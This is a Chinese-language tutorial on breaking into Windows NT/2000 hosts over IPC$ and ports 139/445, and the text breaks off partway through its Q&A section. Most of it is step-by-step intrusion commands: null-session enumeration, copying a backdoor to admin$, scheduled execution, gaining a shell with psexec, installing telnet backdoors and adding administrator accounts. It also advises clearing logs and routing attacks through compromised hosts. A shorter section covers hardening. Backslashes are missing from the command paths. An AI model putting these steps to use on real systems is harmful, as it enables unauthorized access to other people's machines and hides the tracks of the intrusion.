|
|
|
445端口入侵詳解
關(guān)于“445端口入侵”的內(nèi)容 445端口入侵詳解 本站搜索更多關(guān)于“445端口入侵”的內(nèi)容
445端口入侵,在這之前我們首先要看的還是445端口為什么回成為入侵的端口呢? 445端口就是IPC 服務(wù)的默認(rèn)端口 ipc$ 一 摘要 二 什么是 ipc$ 三 什么是空會話 四 空會話可以做什么 五 ipc$ 所使用的端口 六 ipc 管道在 hack 攻擊中的意義 七 ipc$ 連接失敗的常見原因 八 復(fù)制文件失敗的原因 九 關(guān)于 at 命令和 xp 對 ipc$ 的限制 十 如何打開目標(biāo)的 IPC$ 共享以及其他共享 十一 一些需要 shell 才能完成的命令 十二 入侵中可能會用到的命令 十三 對比過去和現(xiàn)今的 ipc$ 入侵 十四 如何防范 ipc$ 入侵 十五 ipc$ 入侵問答精選 十六 結(jié)束的話 一 摘要 網(wǎng)上關(guān)于 ipc$入侵的文章可謂多如牛毛,攻擊步驟甚至已經(jīng)成為了固化的模式,因此也沒人愿意再把這已經(jīng)成為定式的東西拿出來擺弄。不過話雖這樣說,我認(rèn)為這些文章講解的并不詳細(xì),一些內(nèi)容甚至是錯誤的,以致對 ipc$的提問幾乎占了各大安全論壇討論區(qū)的半壁江山,而且這些問題常常都是重復(fù)的,嚴(yán)重影響了論壇質(zhì)量和學(xué)習(xí)效率,因此我總結(jié)了這篇文章,希望能把 ipc$這部分東西盡量說清楚。 注意:本文所討論的各種情況均默認(rèn)發(fā)生在 win NT/2000 環(huán)境下, win98 將不在此次討論之列。 二 什么是 ipc$ IPC$(Internet Process Connection) 是共享 " 命名管道 "的資源,它是為了讓進(jìn)程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道并以此通道進(jìn)行加密數(shù)據(jù)的交換,從而實(shí)現(xiàn)對遠(yuǎn)程計算機(jī)的訪問。 IPC$ 是 NT/2000 的一項新功能,它有一個特點(diǎn),即在同一時間內(nèi),兩個 IP 之間只允許建立一個連接。NT/2000 在提供了 ipc$ 功能的同時,在初次安裝系統(tǒng)時還打開了默認(rèn)共享,即所有的邏輯共享 (c$,d$,e$ …… ) 和系統(tǒng)目錄winnt 或 windows(admin$) 共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導(dǎo)致了系統(tǒng)安全性的降低。 平時我們總能聽到有人在說 ipc$ 漏洞, ipc$ 漏洞,其實(shí) ipc$ 并不是一個真正意義上的漏洞 , 我想之所以有人這么說,一定是指微軟自己安置的那個‘后門:空會話( Null session )。那么什么是空會話呢? 三 什么是空會話 在介紹空會話之前,我們有必要了解一下一個安全會話是如何建立的。 在 Windows NT 4.0 中是使用挑戰(zhàn)響應(yīng)協(xié)議與遠(yuǎn)程機(jī)器建立一個會話的,建立成功的會話將成為一個安全隧道,建立雙方通過它互通信息,這個過程的大致順序如下: 1 )會話請求者(客戶)向會話接收者(服務(wù)器)傳送一個數(shù)據(jù)包,請求安全隧道的建立; 2 )服務(wù)器產(chǎn)生一個隨機(jī)的 64 位數(shù)(實(shí)現(xiàn)挑戰(zhàn))傳送回客戶; 3 )客戶取得這個由服務(wù)器產(chǎn)生的 64 位數(shù),用試圖建立會話的帳號的口令打亂它,將結(jié)果返回到服務(wù)器(實(shí)現(xiàn)響應(yīng)); 4 )服務(wù)器接受響應(yīng)后發(fā)送給本地安全驗(yàn)證( LSA ), LSA通過使用該用戶正確的口令來核實(shí)響應(yīng)以便確認(rèn)請求者身份。如果請求者的帳號是服務(wù)器的本地帳號,核實(shí)本地發(fā)生;如果請求的帳號是一個域的帳號,響應(yīng)傳送到域控制器去核實(shí)。當(dāng)對挑戰(zhàn)的響應(yīng)核實(shí)為正確后,一個訪問令牌產(chǎn)生,然后傳送給客戶。客戶使用這個訪問令牌連接到服務(wù)器上的資源直到建議的會話被終止。 以上是一個安全會話建立的大致過程,那么空會話又如何呢? 空會話是在沒有信任的情況下與服務(wù)器建立的會話(即未提供用戶名與密碼),但根據(jù) WIN2000的訪問控制模型,空會話的建立同樣需要提供一個令牌,可是空會話在建立過程中并沒有經(jīng)過用戶信息的認(rèn)證,所以這個令牌中不包含用戶信息,因此,這個會話不能讓系統(tǒng)間發(fā)送加密信息,但這并不表示空會話的令牌中不包含安全標(biāo)識符 SID (它標(biāo)識了用戶和所屬組),對于一個空會話, LSA 提供的令牌的SID 是 S- 1-5-7 ,這就是空會話的 SID ,用戶名是: ANONYMOUS LOGON(這個用戶名是可以在用戶列表中看到的,但是是不能在 SAM 數(shù)據(jù)庫中找到,屬于系統(tǒng)內(nèi)置的帳號),這個訪問令牌包含下面?zhèn)窝b的組: Everyone Network 在安全策略的限制下,這個空會話將被授權(quán)訪問到上面兩個組有權(quán)訪問到的一切信息。那么建立空會話到底可以作什么呢? 四 空會話可以做什么 對于 NT ,在默認(rèn)安全設(shè)置下,借助空連接可以列舉目標(biāo)主機(jī)上的用戶和共享,訪問 everyone權(quán)限的共享,訪問小部分注冊表等,并沒有什么太大的利用價值;對 2000 作用更小,因?yàn)樵?Windows 2000和以后版本中默認(rèn)只有管理員和備份操作員有權(quán)從網(wǎng)絡(luò)訪問到注冊表,而且實(shí)現(xiàn)起來也不方便,需借助工具。 從這些我們可以看到,這種非信任會話并沒有多大的用處,但從一次完整的 ipc$入侵來看,空會話是一個不可缺少的跳板,因?yàn)槲覀儚乃抢锟梢缘玫綉袅斜恚蠖鄶?shù)弱口令掃描工具就是利用這個用戶列表來進(jìn)行口令猜解的,成功的導(dǎo)出用戶列表大大增加了猜解的成功率,僅從這一點(diǎn),足以說明空會話所帶來的安全隱患,因此說空會話毫無用處的說法是不正確的。以下是空會話中能夠使用的一些具體命令: 1 首先,我們先建立一個空會話(當(dāng)然,這需要目標(biāo)開放 ipc$ ) 命令: net use ipipc$ "" /user:"" 注意:上面的命令包括四個空格, net 與 use 中間有一個空格, use 后面一個,密碼左右各一個空格。 2 查看遠(yuǎn)程主機(jī)的共享資源 命令: net view ip 解釋:前提是建立了空連接后,用此命令可以查看遠(yuǎn)程主機(jī)的共享資源,如果它開了共享,可以得到如下面的結(jié)果,但此命令不能顯示默認(rèn)共享。 在 *.*.*.* 的共享資源 資源共享名 類型 用途 注釋 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 3 查看遠(yuǎn)程主機(jī)的當(dāng)前時間 命令: net time ip 解釋:用此命令可以得到一個遠(yuǎn)程主機(jī)的當(dāng)前時間。 4 得到遠(yuǎn)程主機(jī)的 NetBIOS 用戶名列表(需要打開自己的 NBT ) 命令: nbtstat -A ip 用此命令可以得到一個遠(yuǎn)程主機(jī)的 NetBIOS 用戶名列表,返回如下結(jié)果: Node IpAddress: [*.*.*.*] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER <00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H < 1C > GROUP Registered SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered INet~Services < 1C > GROUP Registered IS~SERVER......<00> UNIQUE Registered MAC Address = 00-50-8B -9A -2D-37 以上就是我們經(jīng)常使用空會話做的事情,好像也能獲得不少東西喲,不過要注意一點(diǎn):建立 IPC$ 連接的操作會在 Event Log 中留下記錄,不管你是否登錄成功。 好了,那么下面我們就來看看 ipc$ 所使用的端口是什么? 五 ipc$ 所使用的端口 首先我們來了解一些基礎(chǔ)知識: 1 SMBServer Message Block) Windows 協(xié)議族,用于文件打印共享的服務(wù); 2 NBTNETBios Over TCP/IP) 使用 137 ( UDP ) 138 ( UDP ) 139 ( TCP )端口實(shí)現(xiàn)基于 TCP/IP 協(xié)議的 NETBIOS 網(wǎng)絡(luò)互聯(lián)。 3 在 WindowsNT 中 SMB 基于 NBT 實(shí)現(xiàn),即使用 139 ( TCP )端口;而在 Windows2000 中, SMB 除了基于 NBT 實(shí)現(xiàn),還可以直接通過 445 端口實(shí)現(xiàn)。 有了這些基礎(chǔ)知識,我們就可以進(jìn)一步來討論訪問網(wǎng)絡(luò)共享對端口的選擇了: 對于 win2000 客戶端(發(fā)起端)來說: 1 如果在允許 NBT 的情況下連接服務(wù)器時,客戶端會同時嘗試訪問 139 和 445 端口,如果 445 端口有響應(yīng),那么就發(fā)送 RST包給 139 端口斷開連接,用 455 端口進(jìn)行會話,當(dāng) 445 端口無響應(yīng)時,才使用 139 端口,如果兩個端口都沒有響應(yīng),則會話失敗; 2 如果在禁止 NBT 的情況下連接服務(wù)器時,那么客戶端只會嘗試訪問 445 端口,如果 445 端口無響應(yīng),那么會話失敗。 對于 win2000 服務(wù)器端來說: 1 如果允許 NBT, 那么 UDP 端口 137, 138, TCP 端口 139, 445 將開放( LISTENING ); 2 如果禁止 NBT ,那么只有 445 端口開放。 我們建立的 ipc$ 會話對端口的選擇同樣遵守以上原則。顯而易見,如果遠(yuǎn)程服務(wù)器沒有監(jiān)聽 139 或 445 端口, ipc$ 會話是無法建立的。 六 ipc 管道在 hack 攻擊中的意義 ipc 管道本來是微軟為了方便管理員進(jìn)行遠(yuǎn)程管理而設(shè)計的,但在入侵者看來,開放 ipc 管道的主機(jī)似乎更容易得手。通過 ipc管道,我們可以遠(yuǎn)程調(diào)用一些系統(tǒng)函數(shù)(大多通過工具實(shí)現(xiàn),但需要相應(yīng)的權(quán)限),這往往是入侵成敗的關(guān)鍵。如果不考慮這些,僅從傳送文件這一方面,ipc 管道已經(jīng)給了入侵者莫大的支持,甚至已經(jīng)成為了最重要的傳輸手段,因此你總能在各大論壇上看到一些朋友因?yàn)榇虿婚_目標(biāo)機(jī)器的 ipc管道而一籌莫展大呼救命。當(dāng)然,我們也不能忽視權(quán)限在 ipc管道中扮演的重要角色,想必你一定品嘗過空會話的尷尬,沒有權(quán)限,開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的權(quán)限,那么 ipc管道這把雙刃劍將顯示出它猙獰的一面。 七 ipc$ 連接失敗的常見原因 以下是一些常見的導(dǎo)致 ipc$ 連接失敗的原因: 1 IPC 連接是 Windows NT 及以上系統(tǒng)中特有的功能,由于其需要用到 Windows NT 中很多 DLL 函數(shù),所以不能在Windows 9.x/Me 系統(tǒng)中運(yùn)行,也就是說只有 nt/2000/xp 才可以相互建立 ipc$ 連接, 98/me 是不能建立ipc$ 連接的; 2 如果想成功的建立一個 ipc$ 連接,就需要響應(yīng)方開啟 ipc$ 共享,即使是空連接也是這樣,如果響應(yīng)方關(guān)閉了 ipc$ 共享,將不能建立連接; 3 連接發(fā)起方未啟動 Lanmanworkstation 服務(wù)(顯示名為: Workstation ):它提供網(wǎng)絡(luò)鏈結(jié)和通訊,沒有它發(fā)起方無法發(fā)起連接請求; 4 響應(yīng)方未啟動 Lanmanserver 服務(wù)(顯示名為: Server ):它提供了 RPC 支持、文件、打印以及命名管道共享, ipc$ 依賴于此服務(wù),沒有它主機(jī)將無法響應(yīng)發(fā)起方的連接請求,不過沒有它仍可發(fā)起 ipc$ 連接; 5 響應(yīng)方未啟動 NetLogon ,它支持網(wǎng)絡(luò)上計算機(jī) pass-through 帳戶登錄身份(不過這種情況好像不多); 6 響應(yīng)方的 139 , 445 端口未處于監(jiān)聽狀態(tài)或被防火墻屏蔽; 7 連接發(fā)起方未打開 139 , 445 端口; 8 用戶名或者密碼錯誤:如果發(fā)生這樣的錯誤,系統(tǒng)將給你類似于 無法更新密碼 這樣的錯誤提示(顯然空會話排除這種錯誤); 9 命令輸入錯誤:可能多了或少了空格,當(dāng)用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號 "" 即可; 10 如果在已經(jīng)建立好連接的情況下對方重啟計算機(jī),那么 ipc$ 連接將會自動斷開,需要重新建立連接。 另外 , 你也可以根據(jù)返回的錯誤號分析原因: 錯誤號 5 ,拒絕訪問:很可能你使用的用戶不是管理員權(quán)限的; 錯誤號 51 , Windows 無法找到網(wǎng)絡(luò)路徑:網(wǎng)絡(luò)有問題; 錯誤號 53 ,找不到網(wǎng)絡(luò)路徑: ip 地址錯誤;目標(biāo)未開機(jī);目標(biāo) lanmanserver 服務(wù)未啟動;目標(biāo)有防火墻(端口過濾); 錯誤號 67 ,找不到網(wǎng)絡(luò)名:你的 lanmanworkstation 服務(wù)未啟動或者目標(biāo)刪除了 ipc$ ; 錯誤號 1219 ,提供的憑據(jù)與已存在的憑據(jù)集沖突:你已經(jīng)和對方建立了一個 ipc$ ,請刪除再連; 錯誤號 1326 ,未知的用戶名或錯誤密碼:原因很明顯了; 錯誤號 1792 ,試圖登錄,但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動:目標(biāo) NetLogon 服務(wù)未啟動; 錯誤號 2242 ,此用戶的密碼已經(jīng)過期:目標(biāo)有帳號策略,強(qiáng)制定期要求更改密碼。 八 復(fù)制文件失敗的原因 有些朋友雖然成功的建立了 ipc$ 連接,但在 copy 時卻遇到了這樣那樣的麻煩,無法復(fù)制成功,那么導(dǎo)致復(fù)制失敗的常見原因又有哪些呢? 1 對方未開啟共享文件夾 這類錯誤出現(xiàn)的最多,占到 50% 以上。許多朋友在 ipc$連接建立成功后,甚至都不知道對方是否有共享文件夾,就進(jìn)行盲目復(fù)制,結(jié)果導(dǎo)致復(fù)制失敗而且郁悶的很。因此我建議大家在進(jìn)行復(fù)制之前務(wù)必用 netview IP 這個命令看一下你想要復(fù)制的共享文件夾是否存在(用軟件查看當(dāng)然更好),不要認(rèn)為能建立 ipc$ 連接就一定有共享文件夾存在。 2 向默認(rèn)共享復(fù)制失敗 這類錯誤也是大家經(jīng)常犯的,主要有兩個小方面: 1 )錯誤的認(rèn)為能建立 ipc$ 連接的主機(jī)就一定開啟了默認(rèn)共享,因而在建立完連接之后馬上向 c$,d$,admin$之類的默認(rèn)共享復(fù)制文件,一旦對方未開啟默認(rèn)共享,將導(dǎo)致復(fù)制失敗。 ipc$ 連接成功只能說明對方打開了 ipc$共享,并不能說明默認(rèn)共享一定存在。 ipc$ 共享與默認(rèn)共享是 兩碼 事, ipc$共享是一個命名管道,并不是哪個實(shí)際的文件夾,而默認(rèn)共享卻是實(shí)實(shí)在在的共享文件夾; 2 )由于 net view IP 這個命令無法顯示默認(rèn)共享文件夾(因?yàn)槟J(rèn)共享帶 $),因此通過這個命令,我們并不能判斷對方是否開啟了默認(rèn)共享,因此如果對方未開啟默認(rèn)共享,那么所有向默認(rèn)共享進(jìn)行的操作都不能成功;(不過大部分掃描軟件在掃弱口令的同時,都能掃到默認(rèn)共享目錄,可以避免此類錯誤的發(fā)生) 要點(diǎn):請大家一定區(qū)分 ipc 共享,默認(rèn)共享,普通共享這三者的區(qū)別: ipc 共享是一個管道,并不是實(shí)際的共享文件夾;默認(rèn)共享是安裝時默認(rèn)打開的文件夾;普通共享是我們自己開啟的可以設(shè)置權(quán)限的共享文件夾。 3 用戶權(quán)限不夠,包括四種情形: 1 )空連接向所有共享(默認(rèn)共享和普通共享)復(fù)制時,權(quán)限是不夠的; 2 )向默認(rèn)共享復(fù)制時,在 Win2000 Pro 版中,只有 Administrators 和 Backup Operators 組成員才可以,在 Win2000 Server 版本 Server Operatros 組也可以訪問到這些共享目錄; 3 )向普通共享復(fù)制時,要具有相應(yīng)權(quán)限(即對方管理員事先設(shè)定的訪問權(quán)限); 4 )對方可以通過防火墻或安全軟件的設(shè)置,禁止外部訪問共享; 注意: 1 不要認(rèn)為 administrator 就一定具有管理員權(quán)限,管理員名稱是可以改的 2 管理員可以訪問默認(rèn)共享的文件夾,但不一定能夠訪問普通的共享文件夾,因?yàn)楣芾韱T可以對普通的共享文件夾進(jìn)行訪問權(quán)限設(shè)置,如圖 6 ,管理員為D 盤設(shè)置的訪問權(quán)限為僅允許名為 xinxin 的用戶對該文件夾進(jìn)行完全訪問,那么此時即使你擁有管理員權(quán)限,你仍然不能訪問 D盤。不過有意思的是,如果此時對方又開啟了 D$ 的默認(rèn)共享,那么你卻可以訪問 D$ ,從而繞過了權(quán)限限制,有興趣的朋友可以自己做測試。 4 被防火墻殺死或在局域網(wǎng) 還有一種情況,那就是也許你的復(fù)制操作已經(jīng)成功,但當(dāng)遠(yuǎn)程運(yùn)行時,被防火墻殺掉了,導(dǎo)致找不到文件;或者你把木馬復(fù)制到了局域網(wǎng)內(nèi)的主機(jī),導(dǎo)致連接失敗(反向連接的木馬不會發(fā)生這種情況)。如果你沒有想到這種情況,你會以為是復(fù)制上出了問題,但實(shí)際你的復(fù)制操作已經(jīng)成功了,只是運(yùn)行時出了問題。 呵呵,大家也知道, ipc$ 連接在實(shí)際操作過程中會出現(xiàn)各種各樣的問題,上面我所總結(jié)的只是一些常見錯誤,沒說到的,大家可以給我提個醒兒。 九 關(guān)于 at 命令和 xp 對 ipc$ 的限制 本來還想說一下用 at 遠(yuǎn)程運(yùn)行程序失敗的原因,但考慮到 at的成功率不是很高,問題也很多,在這里就不提它了(提的越多,用的人就越多),而是推薦大家用 psexec.exe遠(yuǎn)程運(yùn)行程序,假設(shè)想要遠(yuǎn)程機(jī)器執(zhí)行本地 c:xinxin.exe 文件,且管理員為 administrator ,密碼為 1234,那么輸入下面的命令: psexec ip -u administrator -p 1234 -c c:xinxin.exe 如果已經(jīng)建立 ipc 連接,則 -u -p 這兩個參數(shù)不需要, psexec.exe 將自動拷貝文件到遠(yuǎn)程機(jī)器并運(yùn)行。 本來 xp 中的 ipc$ 也不想在這里討論,想單獨(dú)拿出來討論,但看到越來越多的朋友很急切的提問為什么遇到 xp的時候,大部分操作都很難成功。我在這里就簡單提一下吧,在 xp的默認(rèn)安全選項中,任何遠(yuǎn)程訪問僅被賦予來賓權(quán)限,也就是說即使你是用管理員帳戶和密碼,你所得到的權(quán)限也只是 Guest,因此大部分操作都會因?yàn)闄?quán)限不夠而失敗,而且到目前為止并沒有一個好的辦法來突破這一限制。所以如果你真的得到了 xp的管理員密碼,我建議你盡量避開 ipc 管道。 十 如何打開目標(biāo)的 IPC$ 共享以及其他共享 目標(biāo)的 ipc$ 不是輕易就能打開的,否則就要天下打亂了。你需要一個 admin 權(quán)限的 shell ,比如 telnet ,木馬, cmd 重定向等,然后在 shell 下執(zhí)行: net share ipc$ 開放目標(biāo)的 ipc$ 共享; net share ipc$ /del 關(guān)閉目標(biāo)的 ipc$ 共享;如果你要給它開共享文件夾,你可以用: net share xinxin=c: 這樣就把它的 c 盤開為共享名為 xinxin 共享文件夾了。(可是我發(fā)現(xiàn)很多人錯誤的認(rèn)為開共享文件夾的命令是 net share c$ ,還大模大樣的給菜鳥指指點(diǎn)點(diǎn),真是誤人子弟了)。再次聲明,這些操作都是在 shell 下才能實(shí)現(xiàn)的。 十一 一些需要 shell 才能完成的命令 看到很多教程這方面寫的十分不準(zhǔn)確,一些需要 shell 才能完成命令就簡簡單單的在 ipc$ 連接下執(zhí)行了,起了誤導(dǎo)作用。那么下面我總結(jié)一下需要在 shell 才能完成的命令: 1 向遠(yuǎn)程主機(jī)建立用戶,激活用戶,修改用戶密碼,加入管理組的操作需要在 shell 下完成; 2 打開遠(yuǎn)程主機(jī)的 ipc$ 共享,默認(rèn)共享,普通共享的操作需要在 shell 下完成; 3 運(yùn)行 / 關(guān)閉遠(yuǎn)程主機(jī)的服務(wù),需要在 shell 下完成; 4 啟動 / 殺掉遠(yuǎn)程主機(jī)的進(jìn)程,也需要在 shell 下完成(用軟件的情況下除外,如 pskill )。 十二 入侵中可能會用到的命令 為了這份教程的完整性,我列出了 ipc$入侵中的一些常用命令,如果你已經(jīng)掌握了這些命令,你可以跳過這一部分看下面的內(nèi)容。請注意這些命令是適用于本地還是遠(yuǎn)程,如果只適用于本地,你只能在獲得遠(yuǎn)程主機(jī)的 shell (如 cmd , telnet 等)后,才能向遠(yuǎn)程主機(jī)執(zhí)行。 1 建立 / 刪除 ipc$ 連接的命令 1 )建立空連接 : net use 127.0.0.1ipc$ "" /user:"" 2 )建立非空連接 : net use 127.0.0.1ipc$ " 密碼 " /user:" 用戶名 " 3 )刪除連接 : net use 127.0.0.1ipc$ /del 2 在 ipc$ 連接中對遠(yuǎn)程主機(jī)的操作命令 1 ) 查看遠(yuǎn)程主機(jī)的共享資源(看不到默認(rèn)共享) : net view 127.0.0.1 2 ) 查看遠(yuǎn)程主機(jī)的當(dāng)前時間 : net time 127.0.0.1 3 ) 得到遠(yuǎn)程主機(jī)的 netbios 用戶名列表 : nbtstat -A 127.0.0.1 4 )映射 / 刪除遠(yuǎn)程共享 : net use z: 127.0.0.1c 此命令將共享名為 c 的共享資源映射為本地 z 盤 net use z: /del 刪除映射的 z 盤,其他盤類推 5 )向遠(yuǎn)程主機(jī)復(fù)制文件 : copy 路徑 文件名 IP 共享目錄名,如: copy c:xinxin.exe 127.0.0.1c$ 即將 c 盤下的 xinxin.exe 復(fù)制到對方 c 盤內(nèi) 當(dāng)然,你也可以把遠(yuǎn)程主機(jī)上的文件復(fù)制到自己的機(jī)器里: copy 127.0.0.1c$xinxin.exe c: 6 )遠(yuǎn)程添加計劃任務(wù) : at IP 時間 程序名 如: at 127.0.0.0 11:00 xinxin.exe 注意:時間盡量使用 24 小時制;如果你打算運(yùn)行的程序在系統(tǒng)默認(rèn)搜索路徑(比如 system32/ )下則不用加路徑,否則必須加全路徑 3 本地命令 1 )查看本地主機(jī)的共享資源(可以看到本地的默認(rèn)共享) net share 2 )得到本地主機(jī)的用戶列表 net user 3 )顯示本地某用戶的帳戶信息 net user 帳戶名 4 )顯示本地主機(jī)當(dāng)前啟動的服務(wù) net start 5 )啟動 / 關(guān)閉本地服務(wù) net start 服務(wù)名 net stop 服務(wù)名 6 )在本地添加帳戶 net user 帳戶名 密碼 /add 7 )激活禁用的用戶 net uesr 帳戶名 /active:yes 8 )加入管理員組 net localgroup administrators 帳戶名 /add 很顯然的是,雖然這些都是本地命令,但如果你在遠(yuǎn)程主機(jī)的 shell 中輸入,比如你 telnet 成功后輸入上面這些命令,那么這些本地輸入將作用在遠(yuǎn)程主機(jī)上。 4 其他一些命令 1 ) telnet telnet IP 端口 telnet 127.0.0.0 23 2 )用 opentelnet.exe 開啟遠(yuǎn)程主機(jī)的 telnet OpenTelnet.exe ip 管理員帳號 密碼 NTLM 的認(rèn)證方式 port OpenTelnet.exe 127.0.0.1 administrator "" 1 90 不過這個小工具需要滿足四個要求: 1 )目標(biāo)開啟了 ipc$ 共享 2 )你要擁有管理員密碼和帳號 3 )目標(biāo)開啟 RemoteRegistry 服務(wù),用戶就可以更改 ntlm 認(rèn)證 4 )對僅 WIN2K/XP 有效 3 )用 psexec.exe 一步獲得 shell ,需要 ipc 管道支持 psexec.exe IP -u 管理員帳號 -p 密碼 cmd psexec.exe 127.0.0.1 -u administrator -p "" cmd 十三 對比過去和現(xiàn)今的 ipc$ 入侵 既然是對比,那么我就先把過去的 ipc$ 入侵步驟寫給大家,都是蠻經(jīng)典的步驟: [1] C:>net use 127.0.0.1ipc$ "" /user:admintitrators 用掃到的空口令建立連接 [2] c:>net view 127.0.0.1 查看遠(yuǎn)程的共享資源 [3] C:>copy srv.exe 127.0.0.1admin$system32 將一次性后門 srv.exe 復(fù)制到對方的系統(tǒng)文件夾下,前提是 admin$ 開啟 [4] C:>net time 127.0.0.1 查看遠(yuǎn)程主機(jī)的當(dāng)前時間 [5] C:>at 127.0.0.1 時間 srv.exe 用 at 命令遠(yuǎn)程運(yùn)行 srv.exe ,需要對方開啟了 Task Scheduler 服務(wù) [6] C:>net time 127.0.0.1 再次查看當(dāng)前時間來估算 srv.exe 是否已經(jīng)運(yùn)行,此步可以省略 [7] C:>telnet 127.0.0.1 99 開一個新窗口,用 telnet 遠(yuǎn)程登陸到 127.0.0.1 從而獲得一個 shell( 不懂 shell 是什么意思?那你就把它想象成遠(yuǎn)程機(jī)器的控制權(quán)就好了,操作像 DOS) , 99 端口是 srv.exe 開的一次性后門的端口 [8] C:WINNTsystem32>net start telnet 我們在剛剛登陸上的 shell 中啟動遠(yuǎn)程機(jī)器的 telnet 服務(wù),畢竟 srv.exe 是一次性的后門,我們需要一個長久的后門便于以后訪問,如果對方的 telnet 已經(jīng)啟動,此步可省略 [9] C:>copy ntlm.exe 127.0.0.1admin$system32 在原來那個窗口中將 ntlm.exe 傳過去, ntlm.exe 是用來更改 telnet 身份驗(yàn)證的 [10] C:WINNTsystem32>ntlm.exe 在 shell 窗口中運(yùn)行 ntlm.exe ,以后你就可以暢通無阻的 telnet 這臺主機(jī)了 [11] C:>telnet 127.0.0.1 23 在新窗口中 telnet 到 127.0.0.1 ,端口 23 可省略,這樣我們又獲得一個長期的后門 [12] C:WINNTsystem32>net user 帳戶名 密碼 /add C:WINNTsystem32>net uesr guest /active:yes C:WINNTsystem32>net localgroup administrators 帳戶名 /add telnet 上以后,你可以建立新帳戶,激活 guest ,把任何帳戶加入管理員組等 好了,寫到這里我似乎回到了 2 , 3 年前,那時的 ipc$ 大家都是這么用的,不過隨著新工具的出現(xiàn),上面提到的一些工具和命令現(xiàn)在已經(jīng)不常用到了,那就讓我們看看現(xiàn)在的高效而簡單的 ipc$ 入侵吧。 [1] psexec.exe IP -u 管理員帳號 -p 密碼 cmd 用這個工具我們可以一步到位的獲得 shell OpenTelnet.exe server 管理員帳號 密碼 NTLM 的認(rèn)證方式 port 用它可以方便的更改 telnet 的驗(yàn)證方式和端口,方便我們登陸 [2] 已經(jīng)沒有第二步了,用一步獲得 shell 之后,你做什么都可以了,安后門可以用 winshell ,克隆就用 ca 吧,開終端用 3389.vbe ,記錄密碼用 win2kpass ,總之好的工具不少,隨你選了,我就不多說了。 十四 如何防范 ipc$ 入侵 1 禁止空連接進(jìn)行枚舉 ( 此操作并不能阻止空連接的建立 ) 運(yùn)行 regedit ,找到如下主鍵 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] 把 RestrictAnonymous = DWORD 的鍵值改為: 1 如果設(shè)置為 "1" ,一個匿名用戶仍然可以連接到 IPC$ 共享,但無法通過這種連接得到列舉 SAM 帳號和共享信息的權(quán)限;在 Windows2000 中增加了 "2" ,未取得匿名權(quán)的用戶將不能進(jìn)行 ipc$ 空連接。建議設(shè)置為 1。如果上面所說的主鍵不存在,就新建一個再改鍵值。如果你覺得改注冊表麻煩,可以在本地安全設(shè)置中設(shè)置此項: 在本地安全設(shè)置-本地策略-安全選項- 對匿名連接的額外限制 2 禁止默認(rèn)共享 1 )察看本地共享資源 運(yùn)行 -cmd- 輸入 net share 2 )刪除共享(重起后默認(rèn)共享仍然存在) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete (如果有 e,f, ……可以繼續(xù)刪除) 3 )停止 server 服務(wù) net stop server /y (重新啟動后 server 服務(wù)會重新開啟) 4 )禁止自動打開默認(rèn)共享(此操作并不能關(guān)閉 ipc$ 共享) 運(yùn)行 -regedit server 版 : 找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把 AutoShareServer ( DWORD )的鍵值改為 :00000000 。 pro 版 : 找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把 AutoShareWks ( DWORD )的鍵值改為 :00000000 。 這兩個鍵值在默認(rèn)情況下在主機(jī)上是不存在的,需要自己手動添加,修改后重起機(jī)器使設(shè)置生效。 3 關(guān)閉 ipc$ 和默認(rèn)共享依賴的服務(wù) :server 服務(wù) 如果你真的想關(guān)閉 ipc$ 共享,那就禁止 server 服務(wù)吧: 控制面板 - 管理工具 - 服務(wù) - 找到 server 服務(wù)(右擊) - 屬性 - 常規(guī) - 啟動類型 - 選已禁用,這時可能會有提示說: XXX 服務(wù)也會關(guān)閉是否繼續(xù),因?yàn)檫€有些次要的服務(wù)要依賴于 server 服務(wù),不要管它。 4 屏蔽 139 , 445 端口 由于沒有以上兩個端口的支持,是無法建立 ipc$ 的,因此屏蔽 139 , 445 端口同樣可以阻止 ipc$ 入侵。 1 ) 139 端口可以通過禁止 NBT 來屏蔽 本地連接- TCP/IT 屬性-高級- WINS -選‘禁用 TCP/IT 上的 NETBIOS 一項 2 ) 445 端口可以通過修改注冊表來屏蔽 添加一個鍵值 Hive: HKEY_LOCAL_MACHINE Key: SystemControlsetServicesNetBTParameters Name: SMBDeviceEnabled Type: REG_DWORD value: 0 修改完后重啟機(jī)器 注意:如果屏蔽掉了以上兩個端口,你將無法用 ipc$ 入侵別人。 3 )安裝防火墻進(jìn)行端口過濾 6 設(shè)置復(fù)雜密碼,防止通過 ipc$ 窮舉出密碼,我覺得這才是最好的辦法,增強(qiáng)安全意識,比不停的打補(bǔ)丁要安全的多。 十五 ipc$ 入侵問答精選 上面說了一大堆的理論東西,但在實(shí)際中你會遇到各種各樣的問題,因此為了給予大家最大的幫助,我整理了各大安全論壇中一些有代表性的問答,其中的一些答案是我給出的,一些是論壇上的回復(fù),如果有什么疑問,可以來找我討論。 1. 進(jìn)行 ipc$ 入侵的時候,會在服務(wù)器中留下記錄,有什么辦法可以不讓服務(wù)器發(fā)現(xiàn)嗎? 答:留下記錄是一定的,你走后用清除日志程序刪除就可以了,或者用肉雞入侵。 2. 你看下面的情況是為什么,可以連接但不能復(fù)制 net use ***.***.***.***ipc$ " 密碼 " /user:" 用戶名 " 命令成功 copy icmd.exe ***.***.***.***admin$ 找不到網(wǎng)絡(luò)路徑 命令不成功 答:像“找不到網(wǎng)絡(luò)路徑”“找不到網(wǎng)絡(luò)名”之類的問題,大多是因?yàn)槟阆胍獜?fù)制到的共享文件夾沒有開啟,所以在復(fù)制的時候會出現(xiàn)錯誤,你可以試著找找其他的共享文件夾。 3. 如果對方開了 IPC$ 